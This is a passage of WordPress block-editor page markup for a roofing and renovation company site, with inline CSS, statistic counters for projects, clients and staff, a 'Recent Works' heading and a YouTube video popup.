.skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"67d4b8a4-6740-44c1-8315-001228127f3b\"} -->\n<style type=\"text/css\"> .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67d4b8a4-6740-44c1-8315-001228127f3b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"ddc2115b-19da-4fd1-9373-7d3945f2a62f\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"87728901-354e-4436-8ea8-0b84a45f4e35\"} -->\n<style type=\"text/css\"> .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-87728901-354e-4436-8ea8-0b84a45f4e35\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"2c42b546-5b19-4262-8165-7d9dd90f6b0c\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-2c42b546-5b19-4262-8165-7d9dd90f6b0c background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"c5ade1d9-8e73-4377-88eb-178302396f1d\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-c5ade1d9-8e73-4377-88eb-178302396f1d\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"b79f05c0-ebe5-4b26-815c-6970aa7a785d\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section 